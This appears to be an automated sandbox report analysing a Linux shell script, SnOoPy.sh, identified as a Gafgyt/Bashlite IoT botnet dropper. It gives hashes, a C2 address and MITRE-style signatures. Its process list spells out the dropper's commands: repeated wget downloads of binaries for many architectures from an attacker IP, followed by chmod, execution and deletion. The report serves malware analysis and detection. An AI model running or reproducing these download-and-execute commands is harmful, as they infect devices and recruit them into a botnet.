Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
5s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
-
submitted
11/03/2025, 04:07
General
-
Target
SnOoPy.sh
-
Size
2KB
-
MD5
980a26ba1cafc1b1fc7ee497f219ccea
-
SHA1
835b08cb3df398f7657d2841bc0de5de3efd6484
-
SHA256
14dfc408f3fda9e5b1c91f656d73e75f11542c8cc7e19e5fc0e8de75f4a268ec
-
SHA512
037024c89954c83d63bcbc1be518e7b4a19ade021027dcdeea928a8c35da01528ca4ae8713b863a643fd8ae8dabfcb5198c6d9f7df39df29c009f733149cc41a
Score
10/10
Malware Config
Extracted
Family
gafgyt
C2
154.127.56.114:23
Signatures
-
Detected Gafgyt variant 1 IoCs
-
Gafgyt family
-
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 1 IoCs
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/SnOoPy.sh/tmp/SnOoPy.sh1⤵
- Executes dropped EXE
-
/usr/bin/wgetwget http://154.127.56.114/m-i.p-s.SNOOPY2⤵
-
-
/bin/chmodchmod +x m-i.p-s.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/m-i.p-s.SNOOPY./m-i.p-s.SNOOPY2⤵
-
-
/bin/rmrm -rf m-i.p-s.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://154.127.56.114/m-p.s-l.SNOOPY2⤵
-
-
/bin/chmodchmod +x m-p.s-l.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/m-p.s-l.SNOOPY./m-p.s-l.SNOOPY2⤵
-
-
/bin/rmrm -rf m-p.s-l.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://154.127.56.114/s-h.4-.SNOOPY2⤵
-
-
/bin/chmodchmod +x s-h.4-.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/s-h.4-.SNOOPY./s-h.4-.SNOOPY2⤵
-
-
/bin/rmrm -rf s-h.4-.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://154.127.56.114/x-8.6-.SNOOPY2⤵
-
-
/bin/chmodchmod +x x-8.6-.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/x-8.6-.SNOOPY./x-8.6-.SNOOPY2⤵
-
-
/bin/rmrm -rf x-8.6-.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://154.127.56.114/a-r.m-6.SNOOPY2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x a-r.m-6.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/a-r.m-6.SNOOPY./a-r.m-6.SNOOPY2⤵
-
-
/bin/rmrm -rf a-r.m-6.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://154.127.56.114/x-3.2-.SNOOPY2⤵
-
-
/bin/chmodchmod +x x-3.2-.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/x-3.2-.SNOOPY./x-3.2-.SNOOPY2⤵
-
-
/bin/rmrm -rf x-3.2-.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://154.127.56.114/a-r.m-7.SNOOPY2⤵
-
-
/bin/chmodchmod +x a-r.m-7.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/a-r.m-7.SNOOPY./a-r.m-7.SNOOPY2⤵
-
-
/bin/rmrm -rf a-r.m-7.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://154.127.56.114/p-p.c-.SNOOPY2⤵
-
-
/bin/chmodchmod +x p-p.c-.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/p-p.c-.SNOOPY./p-p.c-.SNOOPY2⤵
-
-
/bin/rmrm -rf p-p.c-.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://154.127.56.114/i-5.8-6.SNOOPY2⤵
-
-
/bin/chmodchmod +x i-5.8-6.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/i-5.8-6.SNOOPY./i-5.8-6.SNOOPY2⤵
-
-
/bin/rmrm -rf i-5.8-6.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://154.127.56.114/m-6.8-k.SNOOPY2⤵
-
-
/bin/chmodchmod +x m-6.8-k.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/m-6.8-k.SNOOPY./m-6.8-k.SNOOPY2⤵
-
-
/bin/rmrm -rf m-6.8-k.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://154.127.56.114/p-p.c-.SNOOPY2⤵
-
-
/bin/chmodchmod +x p-p.c-.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/p-p.c-.SNOOPY./p-p.c-.SNOOPY2⤵
-
-
/bin/rmrm -rf p-p.c-.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://154.127.56.114/a-r.m-4.SNOOPY2⤵
-
-
/bin/chmodchmod +x a-r.m-4.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/a-r.m-4.SNOOPY./a-r.m-4.SNOOPY2⤵
-
-
/bin/rmrm -rf a-r.m-4.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://154.127.56.114/a-r.m-5.SNOOPY2⤵
-
-
/bin/chmodchmod +x a-r.m-5.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/a-r.m-5.SNOOPY./a-r.m-5.SNOOPY2⤵
-
-
/bin/rmrm -rf a-r.m-5.SNOOPY2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
108KB
MD5e7748189201994e7b6024eafd747e4d2
SHA1d78148781e6fe3b3b1a371eecaeadbfa58407ddc
SHA256263f1b3b46782a3ccc4b016ff6697e7b6efcd044ee6218c77881cf98206003a2
SHA512ded3aa06d6c9873561293fd8978c1142aabf3794aa4610b72a68d338c7f06047cf64519254965e74c8b8426e6128a81331f5a66b504913cadfe689228640487f